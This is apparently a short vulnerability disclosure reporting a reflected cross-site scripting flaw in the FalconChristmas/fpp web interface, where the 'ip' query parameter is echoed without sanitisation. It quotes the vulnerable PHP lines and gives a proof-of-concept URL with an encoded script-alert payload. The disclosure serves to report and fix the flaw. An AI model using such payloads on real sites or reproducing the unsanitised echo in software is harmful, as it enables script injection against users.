Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/shutdownRemoteFPP.php#L15 a user input is directly echo-ed in the page without sanitization :

$ip = $_GET['ip'];

echo "Shutting down FPP system @ $ip\n";

🕵️‍♂️ Proof of Concept

Visit : http://127.0.0.1/shutdownRemoteFPP.php?ip=%3Cscript%3Ealert(%22zer0h%22);%3C/script%3E

💥 Impact

This vulnerability is capable of XSS